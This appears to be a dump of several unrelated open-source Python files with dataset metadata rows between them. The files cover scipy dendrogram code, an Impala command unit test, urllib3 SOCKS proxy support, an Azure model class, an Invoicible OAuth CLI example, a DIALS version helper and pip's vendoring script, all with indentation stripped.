# Otherwise, use the id as the label for the leaf.x
ivl.append(str(int(i)))
def _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels, show_leaf_counts):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
if ivl is not None:
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
if show_leaf_counts:
ivl.append("(" + str(int(Z[i - n, 3])) + ")")
else:
ivl.append("")
def _append_contraction_marks(Z, iv, i, n, contraction_marks):
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _append_contraction_marks_sub(Z, iv, i, n, contraction_marks):
if i >= n:
contraction_marks.append((iv, Z[i - n, 2]))
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _dendrogram_calculate_info(Z, p, truncate_mode,
color_threshold=np.inf, get_leaves=True,
orientation='top', labels=None,
count_sort=False, distance_sort=False,
show_leaf_counts=False, i=-1, iv=0.0,
ivl=[], n=0, icoord_list=[], dcoord_list=[],
lvs=None, mhr=False,
current_color=[], color_list=[],
currently_below_threshold=[],
leaf_label_func=None, level=0,
contraction_marks=None,
link_color_func=None,
above_threshold_color='b'):
"""
Calculates the endpoints of the links as well as the labels for the
the dendrogram rooted at the node with index i. iv is the independent
variable value to plot the left-most leaf node below the root node i
(if orientation='top', this would be the left-most x value where the
plotting of this root node i and its descendents should begin).
ivl is a list to store the labels of the leaf nodes. The leaf_label_func
is called whenever ivl != None, labels == None, and
leaf_label_func != None. When ivl != None and labels != None, the
labels list is used only for labeling the leaf nodes. When
ivl == None, no labels are generated for leaf nodes.
When get_leaves==True, a list of leaves is built as they are visited
in the dendrogram.
Returns a tuple with l being the independent variable coordinate that
corresponds to the midpoint of cluster to the left of cluster i if
i is non-singleton, otherwise the independent coordinate of the leaf
node if i is a leaf node.
Returns
-------
A tuple (left, w, h, md), where:
* left is the independent variable coordinate of the center of the
the U of the subtree
* w is the amount of space used for the subtree (in independent
variable units)
* h is the height of the subtree in dependent variable units
* md is the max(Z[*,2]) for all nodes * below and including
the target node.
"""
if n == 0:
raise ValueError("Invalid singleton cluster count n.")
if i == -1:
raise ValueError("Invalid root cluster index i.")
if truncate_mode == 'lastp':
# If the node is a leaf node but corresponds to a non-single cluster,
# it's label is either the empty string or the number of original
# observations belonging to cluster i.
if i < 2 * n - p and i >= n:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mtica', 'level'):
if i > n and level > p:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mlab',):
pass
# Otherwise, only truncate if we have a leaf node.
#
# If the truncate_mode is mlab, the linkage has been modified
# with the truncated tree.
#
# Only place leaves if they correspond to original observations.
if i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
# !!! Otherwise, we don't have a leaf node, so work on plotting a
# non-leaf node.
# Actual indices of a and b
aa = int(Z[i - n, 0])
ab = int(Z[i - n, 1])
if aa > n:
# The number of singletons below cluster a
na = Z[aa - n, 3]
# The distance between a's two direct children.
da = Z[aa - n, 2]
else:
na = 1
da = 0.0
if ab > n:
nb = Z[ab - n, 3]
db = Z[ab - n, 2]
else:
nb = 1
db = 0.0
if count_sort == 'ascending' or count_sort == True:
# If a has a count greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if na > nb:
# The cluster index to draw to the left (ua) will be ab
# and the one to draw to the right (ub) will be aa
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif count_sort == 'descending':
# If a has a count less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if na > nb:
ua = aa
ub = ab
else:
ua = ab
ub = aa
elif distance_sort == 'ascending' or distance_sort == True:
# If a has a distance greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if da > db:
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif distance_sort == 'descending':
# If a has a distance less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if da > db:
ua = aa
ub = ab
else:
ua = ab
ub = aa
else:
ua = aa
ub = ab
# Updated iv variable and the amount of space used.
(uiva, uwa, uah, uamd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ua, iv=iv, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
h = Z[i - n, 2]
if h >= color_threshold or color_threshold <= 0:
c = above_threshold_color
if currently_below_threshold[0]:
current_color[0] = (current_color[0] + 1) % len(_link_line_colors)
currently_below_threshold[0] = False
else:
currently_below_threshold[0] = True
c = _link_line_colors[current_color[0]]
(uivb, uwb, ubh, ubmd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ub, iv=iv + uwa, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
max_dist = max(uamd, ubmd, h)
icoord_list.append([uiva, uiva, uivb, uivb])
dcoord_list.append([uah, h, h, ubh])
if link_color_func is not None:
v = link_color_func(int(i))
if not isinstance(v, string_types):
raise TypeError("link_color_func must return a matplotlib "
"color string!")
color_list.append(v)
else:
color_list.append(c)
return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)
def is_isomorphic(T1, T2):
"""
Determines if two different cluster assignments are equivalent.
Parameters
----------
T1 : array_like
An assignment of singleton cluster ids to flat cluster ids.
T2 : array_like
An assignment of singleton cluster ids to flat cluster ids.
Returns
-------
b : bool
Whether the flat cluster assignments `T1` and `T2` are
equivalent.
"""
T1 = np.asarray(T1, order='c')
T2 = np.asarray(T2, order='c')
if type(T1) != np.ndarray:
raise TypeError('T1 must be a numpy array.')
if type(T2) != np.ndarray:
raise TypeError('T2 must be a numpy array.')
T1S = T1.shape
T2S = T2.shape
if len(T1S) != 1:
raise ValueError('T1 must be one-dimensional.')
if len(T2S) != 1:
raise ValueError('T2 must be one-dimensional.')
if T1S[0] != T2S[0]:
raise ValueError('T1 and T2 must have the same number of elements.')
n = T1S[0]
d = {}
for i in xrange(0, n):
if T1[i] in d:
if d[T1[i]] != T2[i]:
return False
else:
d[T1[i]] = T2[i]
return True
def maxdists(Z):
"""
Returns the maximum distance between any non-singleton cluster.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
Returns
-------
maxdists : ndarray
A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents
the maximum distance between any cluster (including
singletons) below and including the node with index i. More
specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the
set of all node indices below and including node i.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
MD = np.zeros((n - 1,))
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))
return MD
def maxinconsts(Z, R):
"""
Returns the maximum inconsistency coefficient for each
non-singleton cluster and its descendents.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : ndarray
The inconsistency matrix.
Returns
-------
MI : ndarray
A monotonic ``(n-1)``-sized numpy array of doubles.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
n = Z.shape[0] + 1
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
MI = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)
return MI
def maxRstat(Z, R, i):
"""
Returns the maximum statistic for each non-singleton cluster and
its descendents.
Parameters
----------
Z : array_like
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : array_like
The inconsistency matrix.
i : int
The column of `R` to use as the statistic.
Returns
-------
MR : ndarray
Calculates the maximum statistic for the i'th column of the
inconsistency matrix `R` for each non-singleton cluster
node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]`` where
``Q(j)`` the set of all node ids corresponding to nodes below
and including ``j``.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
if type(i) is not int:
raise TypeError('The third argument must be an integer.')
if i < 0 or i > 3:
raise ValueError('i must be an integer between 0 and 3 inclusive.')
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
n = Z.shape[0] + 1
MR = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)
return MR
def leaders(Z, T):
"""
Returns the root nodes in a hierarchical clustering.
Returns the root nodes in a hierarchical clustering corresponding
to a cut defined by a flat cluster assignment vector ``T``. See
the ``fcluster`` function for more information on the format of ``T``.
For each flat cluster :math:`j` of the :math:`k` flat clusters
represented in the n-sized flat cluster assignment vector ``T``,
this function finds the lowest cluster node :math:`i` in the linkage
tree Z such that:
* leaf descendents belong only to flat cluster j
(i.e. ``T[p]==j`` for all :math:`p` in :math:`S(i)` where
:math:`S(i)` is the set of leaf ids of leaf nodes descendent
with cluster node :math:`i`)
* there does not exist a leaf that is not descendent with
:math:`i` that also belongs to cluster :math:`j`
(i.e. ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If
this condition is violated, ``T`` is not a valid cluster
assignment vector, and an exception will be thrown.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
T : ndarray
The flat cluster assignment vector.
Returns
-------
L : ndarray
The leader linkage node id's stored as a k-element 1-D array
where ``k`` is the number of flat clusters found in ``T``.
``L[j]=i`` is the linkage cluster node id that is the
leader of flat cluster with id M[j]. If ``i < n``, ``i``
corresponds to an original observation, otherwise it
corresponds to a non-singleton cluster.
For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with
id 8's leader is linkage node 2.
M : ndarray
The leader linkage node id's stored as a k-element 1-D array where
``k`` is the number of flat clusters found in ``T``. This allows the
set of flat cluster ids to be any arbitrary set of ``k`` integers.
"""
Z = np.asarray(Z, order='c')
T = np.asarray(T, order='c')
if type(T) != np.ndarray or T.dtype != 'i':
raise TypeError('T must be a one-dimensional numpy array of integers.')
is_valid_linkage(Z, throw=True, name='Z')
if len(T) != Z.shape[0] + 1:
raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')
Cl = np.unique(T)
kk = len(Cl)
L = np.zeros((kk,), dtype='i')
M = np.zeros((kk,), dtype='i')
n = Z.shape[0] + 1
[Z, T] = _copy_arrays_if_base_present([Z, T])
s = _hierarchy.leaders(Z, T, L, M, int(kk), int(n))
if s >= 0:
raise ValueError(('T is not a valid assignment vector. Error found '
'when examining linkage node %d (< 2n-1).') % s)
return (L, M)
# These are test functions to help me test the leaders function.
def _leaders_test(Z, T):
tr = to_tree(Z)
_leaders_test_recurs_mark(tr, T)
return tr
def _leader_identify(tr, T):
if tr.is_leaf():
return T[tr.id]
else:
left = tr.get_left()
right = tr.get_right()
lfid = _leader_identify(left, T)
rfid = _leader_identify(right, T)
print('ndid: %d lid: %d lfid: %d rid: %d rfid: %d'
% (tr.get_id(), left.get_id(), lfid, right.get_id(), rfid))
if lfid != rfid:
if lfid != -1:
print('leader: %d with tag %d' % (left.id, lfid))
if rfid != -1:
print('leader: %d with tag %d' % (right.id, rfid))
return -1
else:
return lfid
def _leaders_test_recurs_mark(tr, T):
if tr.is_leaf():
tr.asgn = T[tr.id]
else:
tr.asgn = -1
_leaders_test_recurs_mark(tr.left, T)
_leaders_test_recurs_mark(tr.right, T)
| bsd-3-clause | 6,255,493,199,539,831,000 | 32.899373 | 155 | 0.588742 | false |
cloudera/Impala | tests/unittests/test_command.py | 2 | 1791 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Unit tests for collect_diagnostics.Command
import os
import pytest
import sys
# Update the sys.path to include the modules from bin/diagnostics.
sys.path.insert(0,
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../bin/diagnostics')))
from collect_diagnostics import Command
class TestCommand(object):
""" Unit tests for the Command class"""
def test_simple_commands(self):
# Successful command
c = Command(["echo", "foo"], 1000)
assert c.run() == 0, "Command expected to succeed, but failed"
assert c.stdout.strip("\n") == "foo"
# Failed command, check return code
c = Command(["false"], 1000)
assert c.run() == 1
def test_command_timer(self):
# Try to run a command that sleeps for 1000s and set a
# timer for 1 second. The command should timed out.
c = Command(["sleep", "1000"], 1)
assert c.run() != 0, "Command expected to timeout but succeeded."
assert c.child_killed_by_timeout, "Command didn't timeout as expected."
| apache-2.0 | -3,043,633,197,999,597,600 | 35.55102 | 86 | 0.717476 | false |
danielecook/gist-alfred | urllib3/contrib/socks.py | 5 | 6386 | # -*- coding: utf-8 -*-
"""
This module contains provisional support for SOCKS proxies from within
urllib3. This module supports SOCKS4 (specifically the SOCKS4A variant) and
SOCKS5. To enable its functionality, either install PySocks or install this
module with the ``socks`` extra.
The SOCKS implementation supports the full range of urllib3 features. It also
supports the following SOCKS features:
- SOCKS4
- SOCKS4a
- SOCKS5
- Usernames and passwords for the SOCKS proxy
Known Limitations:
- Currently PySocks does not support contacting remote websites via literal
IPv6 addresses. Any such connection attempt will fail. You must use a domain
name.
- Currently PySocks does not support IPv6 connections to the SOCKS proxy. Any
such connection attempt will fail.
"""
from __future__ import absolute_import
try:
import socks
except ImportError:
import warnings
from ..exceptions import DependencyWarning
warnings.warn((
'SOCKS support in urllib3 requires the installation of optional '
'dependencies: specifically, PySocks. For more information, see '
'https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies'
),
DependencyWarning
)
raise
from socket import error as SocketError, timeout as SocketTimeout
from ..connection import (
HTTPConnection, HTTPSConnection
)
from ..connectionpool import (
HTTPConnectionPool, HTTPSConnectionPool
)
from ..exceptions import ConnectTimeoutError, NewConnectionError
from ..poolmanager import PoolManager
from ..util.url import parse_url
try:
import ssl
except ImportError:
ssl = None
class SOCKSConnection(HTTPConnection):
"""
A plain-text HTTP connection that connects via a SOCKS proxy.
"""
def __init__(self, *args, **kwargs):
self._socks_options = kwargs.pop('_socks_options')
super(SOCKSConnection, self).__init__(*args, **kwargs)
def _new_conn(self):
"""
Establish a new connection via the SOCKS proxy.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = socks.create_connection(
(self.host, self.port),
proxy_type=self._socks_options['socks_version'],
proxy_addr=self._socks_options['proxy_host'],
proxy_port=self._socks_options['proxy_port'],
proxy_username=self._socks_options['username'],
proxy_password=self._socks_options['password'],
proxy_rdns=self._socks_options['rdns'],
timeout=self.timeout,
**extra_kw
)
except SocketTimeout:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except socks.ProxyError as e:
# This is fragile as hell, but it seems to be the only way to raise
# useful errors here.
if e.socket_err:
error = e.socket_err
if isinstance(error, SocketTimeout):
raise ConnectTimeoutError(
self,
"Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout)
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % error
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % e
)
except SocketError as e: # Defensive: PySocks should catch all these.
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
# We don't need to duplicate the Verified/Unverified distinction from
# urllib3/connection.py here because the HTTPSConnection will already have been
# correctly set to either the Verified or Unverified form by that module. This
# means the SOCKSHTTPSConnection will automatically be the correct type.
class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection):
pass
class SOCKSHTTPConnectionPool(HTTPConnectionPool):
ConnectionCls = SOCKSConnection
class SOCKSHTTPSConnectionPool(HTTPSConnectionPool):
ConnectionCls = SOCKSHTTPSConnection
class SOCKSProxyManager(PoolManager):
"""
A version of the urllib3 ProxyManager that routes connections via the
defined SOCKS proxy.
"""
pool_classes_by_scheme = {
'http': SOCKSHTTPConnectionPool,
'https': SOCKSHTTPSConnectionPool,
}
def __init__(self, proxy_url, username=None, password=None,
num_pools=10, headers=None, **connection_pool_kw):
parsed = parse_url(proxy_url)
if username is None and password is None and parsed.auth is not None:
split = parsed.auth.split(':')
if len(split) == 2:
username, password = split
if parsed.scheme == 'socks5':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = False
elif parsed.scheme == 'socks5h':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = True
elif parsed.scheme == 'socks4':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = False
elif parsed.scheme == 'socks4a':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = True
else:
raise ValueError(
"Unable to determine SOCKS version from %s" % proxy_url
)
self.proxy_url = proxy_url
socks_options = {
'socks_version': socks_version,
'proxy_host': parsed.host,
'proxy_port': parsed.port,
'username': username,
'password': password,
'rdns': rdns
}
connection_pool_kw['_socks_options'] = socks_options
super(SOCKSProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme
| mit | 9,006,006,380,867,902,000 | 32.260417 | 79 | 0.612903 | false |
AutorestCI/azure-sdk-for-python | azure-servicefabric/azure/servicefabric/models/chaos_context_map_item.py | 1 | 1090 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ChaosContextMapItem(Model):
"""Describes an item in the ChaosContextMap in ChaosParameters.
.
:param key: The key for a ChaosContextMapItem.
:type key: str
:param value: The value for a ChaosContextMapItem.
:type value: str
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str'},
'value': {'key': 'Value', 'type': 'str'},
}
def __init__(self, key, value):
self.key = key
self.value = value
| mit | -7,523,740,089,934,637,000 | 28.459459 | 76 | 0.544954 | false |
mirumee/python-invoicible | examples/cli.py | 1 | 7581 | import cmd
import copy
import httplib
import oauth.oauth as oauth
import pprint
import readline
import sys
import urlparse
import webbrowser
import invoicible
# key and secret granted by the service provider for this consumer application
CONSUMER_KEY = ''
CONSUMER_SECRET_KEY = ''
# access token for this consumer application which allows access to user resources
ACCESS_TOKEN_KEY = ''
ACCESS_TOKEN_SECRET = ''
COMPANY_DOMAIN = ''
def ask(question):
while True:
result = raw_input(question)
if result.lower() in ('y', 'yes', ''):
return True
elif result.lower() in ('n', 'no'):
return False
class InvoicibleOAuthHelper(oauth.OAuthClient):
"""
This is helper for oauth autorization, if you are going to create your own client
you should check the logic of authorize method.
"""
request_token_path = '/oauth/request/token/'
access_token_path = '/oauth/access/token/'
authorization_path = '/oauth/autoryzacja/'
def __init__(self, consumer_key, consumer_secret, company_domain):
self.company_domain = company_domain
self.connection = httplib.HTTPSConnection(self.company_domain)
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method_hmac_sha1 = oauth.OAuthSignatureMethod_HMAC_SHA1()
def authorize(self):
request_token = self.fetch_request_token()
verifier = self.authorize_token(request_token)
access_token = self.fetch_access_token(verifier)
return access_token
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
http_url=urlparse.urlunparse(("https", self.company_domain, self.request_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, None)
self.connection.request(
oauth_request.http_method,
self.request_token_path,
headers=oauth_request.to_header()
)
response = self.connection.getresponse()
self._request_token = oauth.OAuthToken.from_string(response.read())
return self._request_token
def fetch_verifier(self, url):
webbrowser.open_new(url)
verifier = raw_input('Copy verifier which you should see on page after autorization:')
return verifier
def authorize_token(self, request_token):
oauth_request = oauth.OAuthRequest.from_token_and_callback(
token=request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.authorization_path, None, None, None))
)
self._verifier = self.fetch_verifier(oauth_request.to_url())
return self._verifier
def fetch_access_token(self, verifier=None):
self._request_token.verifier = verifier
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
token=self._request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.access_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, self._request_token)
self.connection.request(oauth_request.http_method, self.access_token_path, headers=oauth_request.to_header())
response = self.connection.getresponse()
self.access_token = oauth.OAuthToken.from_string(response.read())
return self.access_token
class SimpleClientCommandLine(cmd.Cmd):
"""
Really simple invoicible application. It allows to list and updates some resources through api.
"""
def __init__(self, client, *args, **kwargs):
self.client = client
self.customer_manager = invoicible.CustomerManager(self.client)
self.estimate_manager = invoicible.EstimateManager(self.client)
self.invoice_manager = invoicible.InvoiceManager(self.client)
self.prompt = "invoicible$ "
self.intro = "\nThis is really simple invoicible api client. Type 'help' or '?' for usage hints.\n"
#cmd.Cmd is old style class
cmd.Cmd.__init__(self, *args, **kwargs)
def do_help(self, *args):
print "list"
#print "create"
print "delete"
print "quit"
def help_delete(self):
print "delete resource_uri"
def do_delete(self, line):
args = line.split()
if len(args) != 1:
return self.help_delete()
else:
self.client.delete_resource(args[0])
def help_list(self):
print "list invoices|estimates|customers"
def do_list(self, line):
args = line.split()
if len(args) != 1 or args[0] not in ['invoices', 'customers', 'estimates']:
return self.help_list()
if args[0] == 'customers':
result = self.customer_manager.all()
elif args[0] == 'estimates':
result = self.estimate_manager.all()
else:
result = self.invoice_manager.all()
pprint.pprint(result)
def complete_list(self, line, *args):
return [ command for command in ('invoices', 'customers', 'estimates') if command.startswith(line)]
def do_EOF(self, line):
print ""
return 1
do_quit = do_EOF
def run_example(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET_KEY,
access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET, company_domain=COMPANY_DOMAIN):
if not consumer_key or not consumer_secret:
print """
You have not provided application (oauth consumer) keys. Please search invoicible api (centrumfaktur.pl/api)
documentation for testing keys (or generate new ones for your application in invoivible service)
and put those values into this file (%s) as CONSUMER_KEY and CONSUMER_SECRET_KEY.
""" % (__file__)
sys.exit(1)
if not company_domain:
company_domain = raw_input("Please provide company domain (and put it to this file as COMPANY_DOMAIN to prevent this step in the future) which resources you want to access (for example: mycompany.centrumfaktur.pl): ")
if not access_token_key and not access_token_secret:
print """
You have not provided oauth access token which allows your application access given user resources.
If you have already those keys generated please put them into this file (%s) as ACCESS_TOKEN_KEY and
ACCESS_TOKEN_SECRET.
""" % (__file__)
if not ask("Do you want to generate access token ([y]/n)?"):
sys.exit(1)
oauth_helper = InvoicibleOAuthHelper(consumer_key, consumer_secret, company_domain)
access_token = oauth_helper.authorize()
access_token_key, access_token_secret = access_token.key, access_token.secret
print """
Please copy access token key: %s and access token secret: %s as ACCESS_TOKEN_KEY and ACCESS_TOKEN_SECRET
into this file (%s) so next time you will skip application autorization step.
""" % (access_token_key, access_token_secret, __file__)
if not company_domain:
company_domain = raw_input("Please provide company domain (for example: mycompany.centrumfaktur.pl - you can put it to this file as COMPANY_DOMAIN):")
invoicible_client = invoicible.Client(
consumer_key,
consumer_secret,
access_token_key,
access_token_secret,
invoicible_domain = company_domain,
)
command_line = SimpleClientCommandLine(invoicible_client)
command_line.cmdloop()
if __name__ == "__main__":
run_example()
| lgpl-3.0 | -4,260,646,054,423,910,400 | 37.678571 | 225 | 0.664688 | false |
dials/dials | util/version.py | 1 | 4510 | # DIALS version numbers are constructed from
# 1. a common prefix
__dials_version_format = "DIALS %s"
# 2. the most recent annotated git tag (or failing that: a default string)
__dials_version_default = "3.5"
# 3. a dash followed by the number of commits since that tag
# 4. a dash followed by a lowercase 'g' and the current commit id
def get_git_version(dials_path, treat_merges_as_single_commit=False):
import os
import subprocess
version = None
with open(os.devnull, "w") as devnull:
# Obtain name of the current branch. If this fails then the other commands will probably also fail
branch = (
subprocess.check_output(
["git", "branch", "--all", "--contains", "HEAD"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
releasebranch = "dials-3" in branch
# Always treat merges as single commit on release branches
if releasebranch:
treat_merges_as_single_commit = True
# Get descriptive version string, eg. v1.1.0-1-g56f9cd7
if treat_merges_as_single_commit:
try:
# Get a 'correct' depth, which should be the shortest path to the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long", "--first-parent"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
except Exception:
pass # This is not supported on older git versions < 1.8.4.
if version is None:
# Find the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long"], cwd=dials_path, stderr=devnull
)
.rstrip()
.decode("latin-1")
)
if treat_merges_as_single_commit:
tag = version[: version.rindex("-", 0, version.rindex("-"))]
commit = version[version.rindex("-") + 1 :] # 'gxxxxxxx'
# Now find the first-parent-path
depth = subprocess.check_output(
["git", "rev-list", f"{tag}..HEAD", "--first-parent"],
cwd=dials_path,
stderr=devnull,
).rstrip()
if depth:
depth = depth.strip().count("\n") + 1
else:
depth = 0
version = "%s-%d-%s" % (tag, depth, commit)
# Turn descriptive version string into proper version number
if version[0] == "v":
version = version[1:].replace(".0-", "-")
version = version.replace("-", ".", 1)
# If we are on a release branch, then append a '-release'-tag
if releasebranch:
version = version + "-release"
return str(version)
# When run from a development installation the version information is extracted
# from the git repository. Otherwise it is read from the file '.gitversion' in the
# DIALS module directory.
def dials_version():
"""Try to obtain the current git revision number
and store a copy in .gitversion"""
version = None
try:
import os
dials_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
version_file = os.path.join(dials_path, ".gitversion")
# 1. Try to access information in .git directory
# Regenerate .gitversion if possible
if not os.environ.get("DIALS_SKIP_GIT_VERSIONING") and os.path.exists(
os.path.join(dials_path, ".git")
):
try:
version = get_git_version(dials_path)
with open(version_file, "w") as gv:
gv.write(version)
except Exception:
if version == "":
version = None
# 2. If .git directory missing or 'git describe' failed, read .gitversion
if (version is None) and os.path.exists(version_file):
with open(version_file) as gv:
version = gv.read().rstrip()
except Exception:
pass
if version is None:
version = __dials_version_format % __dials_version_default
else:
version = __dials_version_format % version
return version
| bsd-3-clause | 3,118,716,970,657,075,000 | 35.967213 | 106 | 0.531486 | false |
sigmavirus24/pip | tasks/vendoring/__init__.py | 1 | 3688 | """"Vendoring script, python 3.5 needed"""
from pathlib import Path
import re
import shutil
import invoke
TASK_NAME = 'update'
FILE_WHITE_LIST = (
'Makefile',
'vendor.txt',
'__init__.py',
'README.rst',
)
def drop_dir(path):
shutil.rmtree(str(path))
def remove_all(paths):
for path in paths:
if path.is_dir():
drop_dir(path)
else:
path.unlink()
def log(msg):
print('[vendoring.%s] %s' % (TASK_NAME, msg))
def clean_vendor(ctx, vendor_dir):
# Old _vendor cleanup
remove_all(vendor_dir.glob('*.pyc'))
log('Cleaning %s' % vendor_dir)
for item in vendor_dir.iterdir():
if item.is_dir():
shutil.rmtree(str(item))
elif item.name not in FILE_WHITE_LIST:
item.unlink()
else:
log('Skipping %s' % item)
def rewrite_imports(package_dir, vendored_libs):
for item in package_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
